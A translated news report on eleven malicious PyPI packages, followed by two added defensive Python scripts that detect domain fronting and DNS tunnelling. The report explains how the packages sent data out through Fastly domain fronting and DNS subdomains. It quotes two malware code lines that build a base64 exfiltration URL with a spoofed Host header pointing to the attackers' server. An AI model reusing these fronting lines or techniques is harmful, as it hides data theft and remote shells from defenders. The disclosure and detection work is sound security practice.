Eleven packages containing malicious code were found in the PyPI (Python Package Index) repository. Before the problem was detected, the packages had been downloaded about 38 thousand times in total. The detected malicious packages stand out for their use of sophisticated techniques to hide the communication channels to the attackers' servers.
- importantpackage (6305 downloads), important-package (12897) - established a connection to an external server, disguised as a connection to pypi.python.org, to provide shell access to the system (reverse shell), and used the trevorc2 program to hide the communication channel.
- pptest (10001), ipboards (946) - used DNS as a communication channel to send information about the system (in the first package the host name, working directory, internal and external IP; in the second the user name and host name).
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - located Discord service tokens on the system and sent them to an external host.
- trrfab (287) - sent an identifier, the host name and the contents of /etc/passwd, /etc/hosts and /home to an external host.
- 10Cent10 (490) - established a reverse shell connection to an external host.
- yandex-yt (4183) - displayed a message saying the system was compromised and redirected to a page with further information about next steps, served through nda.ya.ru (api.ya.cc).
Particularly noteworthy is the method of reaching external hosts used in the importantpackage and important-package packages, which abused the Fastly content delivery network that serves the PyPI repository to hide their activity. The requests were in fact sent to the pypi.python.org server (including specifying the python.org name in the SNI field of the HTTPS request), but the HTTP "Host" header carried the name of a server controlled by the attackers (psec.forward.io.global.prod.fastly.net). The content delivery network then forwarded the request to the attackers' server, so the data travelled inside a TLS connection whose parameters were those of pypi.python.org.
The PyPI infrastructure runs on the Fastly content delivery network, which uses a transparent Varnish proxy to cache typical requests and terminates TLS at the CDN level rather than on the origin servers, so that HTTPS requests are relayed through the proxy. Regardless of the host the client is targeting, the request arrives at the proxy, which selects the required backend from the "Host" HTTP header. The domain names are bound to CDN load balancer IP addresses that are shared by all Fastly customers.
The attackers' server is also registered with the Fastly CDN, which offers free plans to anyone and even allows anonymous registration. Notably, the reverse shell scheme is also used to send requests to the victim, but the connection is initiated from the victim's side. From the outside, communication with the attackers' server looks like legitimate sessions with the PyPI repository, protected with the PyPI TLS certificate. A similar technique, known as "domain fronting", was previously widely used to hide host names when circumventing blocking. It relies on the HTTPS access feature offered by some CDNs: a decoy host name is given in the SNI, while the host actually requested is sent in the HTTP Host header inside the TLS session.
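The defensive counterpart of the technique described above is to compare the host name advertised in the TLS handshake (SNI) with the HTTP Host header once the request is decrypted. The following is an added example, not code from the article or from the packages it describes; it assumes a TLS-terminating proxy or IDS writes one request per line in a constructed key=value format, and the field names (sni, host, uri, ...) and sample addresses are assumptions made for this example. Only the psec.forward... host name comes from the article.

```python
"""Detect SNI / Host-header disagreement in HTTPS proxy logs.

Added example for this article; it is not code from the article or from the
packages it describes. It assumes a TLS-terminating proxy (or an IDS with TLS
and HTTP logging) writes one request per line in a constructed key=value
format. Field names (sni, host, uri, ...) are assumptions for the example.
"""
import re

# Constructed sample lines. The psec.forward... host name is the one the
# article reports; the IP addresses (TEST-NET-3 range) and the other hosts
# are made up for this example.
SAMPLE_LOG = """\
ts=1636000000 src=10.0.0.5 dst=203.0.113.10 sni=pypi.python.org host=pypi.python.org uri=/simple/requests/
ts=1636000001 src=10.0.0.5 dst=203.0.113.10 sni=pypi.python.org host=psec.forward.io.global.prod.fastly.net uri=/images?guid=aGVsbG8=
ts=1636000002 src=10.0.0.7 dst=203.0.113.10 sni=files.pythonhosted.org host=files.pythonhosted.org uri=/packages/x.whl
ts=1636000003 src=10.0.0.9 dst=203.0.113.44 sni=cdn.example.net host=www.example.net uri=/
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> dict:
    """Turn one key=value log line into a dict."""
    return dict(FIELD.findall(line))


def registrable_domain(name: str) -> str:
    """Crude eTLD+1: the last two labels. Good enough for this sample; a
    production rule should consult the Public Suffix List so that names
    such as example.co.uk are grouped correctly."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_fronting(log_text: str) -> list:
    """Return the parsed requests whose Host header names a different
    registrable domain than the SNI advertised in the TLS handshake.

    Sub-domain differences (cdn.example.net vs www.example.net) are normal on
    CDNs and are deliberately not flagged; a different registrable domain
    is the domain-fronting signature the article describes.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        sni, host = rec.get("sni"), rec.get("host")
        if not sni or not host:
            continue
        # Strip any :port suffix from the Host header before comparing.
        host_name = host.split(":")[0]
        if registrable_domain(sni) != registrable_domain(host_name):
            rec["reason"] = f"SNI {sni} vs Host {host_name}"
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_fronting(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}: {hit['reason']} ({hit['uri']})")
```

On the sample above only the second line is reported: the SNI says pypi.python.org while the Host header points at a fastly.net name. The check is only possible where TLS is inspected; on the wire, as the article notes, such traffic is indistinguishable from ordinary PyPI sessions, so the alternative is to look at the package itself (unexpected network code in setup.py or at import time).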

To further hide the malicious activity, the TrevorC2 package was used to make the interaction with the server resemble ordinary web browsing; for example, malicious requests were sent under the guise of downloading an image from "https://pypi.python.org/images/?guid=", with the data encoded in the guid parameter:

    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

The pptest and ipboards packages used a different way of hiding their network activity, based on encoding the useful information in queries to a DNS server. The malware sends information by issuing DNS requests of the form "nu4timjagq4fimbuhe.example.com", in which the data being transmitted to the control server is encoded in base64 format inside the subdomain name. The attacker receives these messages by controlling the DNS server for the example.com domain.
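The DNS channel just described leaves a characteristic trace in resolver logs: long, high-entropy subdomain labels, many of them, all under one parent domain. The following is an added example, not code from the article or from the pptest / ipboards packages; its input is a constructed list of query names in the form a resolver log or Zeek dns.log would record them, and the thresholds are assumptions chosen for this sample. Only the first query name is taken from the article.

```python
"""Score DNS query names for data tunnelled in subdomain labels.

Added example for this article; it is not code from the article or from the
pptest / ipboards packages. Input is a constructed list of query names in the
form a resolver log or Zeek dns.log would record them; thresholds are
assumptions chosen for this sample.
"""
import math
from collections import Counter, defaultdict

# Constructed sample. The first name is the one quoted in the article; the
# other two example.com names are made-up base32-style labels, and the
# remaining names are ordinary lookups for contrast.
SAMPLE_QUERIES = [
    "nu4timjagq4fimbuhe.example.com",
    "mfrggzdfmztwq2lknnwg23tpobyxe.example.com",
    "orsxg5bnnfxgm3ykmvzxi5dsmfsw2.example.com",
    "www.example.com",
    "pypi.python.org",
    "files.pythonhosted.org",
    "mail.example.org",
]


def shannon_entropy(s: str) -> float:
    """Bits per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_query(qname: str):
    """Split into (parent domain, subdomain labels). The parent is taken as
    the last two labels: a crude eTLD+1 that ignores the Public Suffix List."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def score_query(qname: str, min_len: int = 16, min_entropy: float = 3.0) -> dict:
    """Return {"qname", "parent", "payload", "entropy", "suspicious"}.

    A query is suspicious when the subdomain part is long enough to carry a
    payload AND its characters are spread out like encoded data. Short or
    repetitive labels such as www, mail or cdn01 score low on both.
    """
    parent, sub = split_query(qname)
    payload = "".join(sub)
    ent = shannon_entropy(payload)
    return {
        "qname": qname,
        "parent": parent,
        "payload": payload,
        "entropy": ent,
        "suspicious": len(payload) >= min_len and ent >= min_entropy,
    }


def find_exfil(queries, min_distinct: int = 3) -> dict:
    """Group suspicious queries by parent domain and keep the parents that
    received at least min_distinct distinct encoded subdomains: one odd
    name may be a CDN hash, a stream of them to a single zone looks like a
    channel to a DNS server the attacker controls."""
    by_parent = defaultdict(set)
    for q in queries:
        s = score_query(q)
        if s["suspicious"]:
            by_parent[s["parent"]].add(s["qname"])
    return {p: sorted(names) for p, names in by_parent.items() if len(names) >= min_distinct}


if __name__ == "__main__":
    for parent, names in find_exfil(SAMPLE_QUERIES).items():
        print(f"{parent}: {len(names)} encoded subdomains, e.g. {names[0]}")
```

Legitimate services (CDN cache keys, anti-spam lookups, some certificate transparency checks) also produce long random-looking labels, which is why the grouping step and the per-parent threshold matter more than any single query; in practice the thresholds are tuned against a baseline of the organisation's own resolver logs.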
Source: opennet.ru
